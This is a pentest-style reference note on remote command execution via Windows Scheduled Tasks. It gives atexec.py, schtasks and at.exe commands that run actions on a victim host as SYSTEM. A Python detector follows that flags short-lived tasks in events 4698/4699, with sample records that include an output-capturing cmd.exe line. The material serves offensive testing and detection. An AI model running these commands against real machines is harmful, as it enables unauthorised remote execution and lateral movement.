ATExec / SchTaskExec
Administrator rights on the target machine are mandatory.
SchTasks is short for Scheduled Tasks. The service is reached over DCE/RPC: the client first contacts the RPC endpoint mapper on TCP port 135 and then continues on an ephemeral (dynamic) high port. Much like creating a cron job on Linux, you schedule a task for a given time and it executes whatever action you specify.
```
# Executes a command on the target machine via the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>
```

```
# Manual equivalent with the built-in schtasks utility: create the task, run it once, then delete it.
schtasks /create /tn <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /F /delete /tn <TASK_NAME> /S <VICTIM>
```

```
# Legacy at.exe equivalent: schedule a one-off command on the remote host.
At \\<IP> 11:00:00PM shutdown -r
```
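From the defender's side, the create / run / delete sequence above leaves a distinctive trace: a scheduled task that is registered and removed within seconds, whose action is a cmd.exe invocation redirecting its output into a file under an administrative share so the caller can read the result. The following is an added example (not part of these notes or of any tool) that pairs Windows Security events 4698 (task created) and 4699 (task deleted) to surface such short-lived tasks; the event records are constructed and simplified, not real log exports.

```python
from datetime import datetime, timedelta

# Constructed sample records modelled on Security events 4698/4699 (not real data).
EVENTS = [
    {"id": 4698, "time": "2024-05-01T22:59:58", "host": "WS01", "user": "CORP\\svc_backup",
     "task": "\\Nightly Backup", "action": "C:\\Program Files\\Backup\\backup.exe"},
    {"id": 4698, "time": "2024-05-01T23:00:01", "host": "WS01", "user": "CORP\\jdoe",
     "task": "\\rHqVkzXs",
     "action": "cmd.exe /C whoami > \\\\127.0.0.1\\ADMIN$\\Temp\\out.tmp 2>&1"},
    {"id": 4699, "time": "2024-05-01T23:00:04", "host": "WS01", "user": "CORP\\jdoe",
     "task": "\\rHqVkzXs", "action": ""},
    {"id": 4699, "time": "2024-05-02T03:00:00", "host": "WS01", "user": "CORP\\svc_backup",
     "task": "\\Nightly Backup", "action": ""},
]


def parse(ts):
    return datetime.fromisoformat(ts)


def find_short_lived_tasks(events, max_age=timedelta(minutes=5)):
    """Pair each 4699 deletion with the latest 4698 creation of the same task
    name on the same host and report pairs whose lifetime is <= max_age."""
    created = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["task"])
        if ev["id"] == 4698:
            created[key] = ev
        elif ev["id"] == 4699 and key in created:
            c = created.pop(key)
            age = parse(ev["time"]) - parse(c["time"])
            if age <= max_age:
                action = c["action"].lower()
                findings.append({
                    "host": c["host"], "task": c["task"], "user": c["user"],
                    "lifetime_s": age.total_seconds(),
                    # Output redirected into a file under an admin share marks a task
                    # used to run a single command and collect its output remotely.
                    "output_capture": "cmd.exe" in action and ">" in action and "admin$" in action,
                })
    return findings


if __name__ == "__main__":
    for finding in find_short_lived_tasks(EVENTS):
        print(finding)
```

Tune `max_age` to your environment; legitimate one-shot tasks created by deployment tooling can also be short-lived, so the `output_capture` flag is what separates the pattern described here from routine automation.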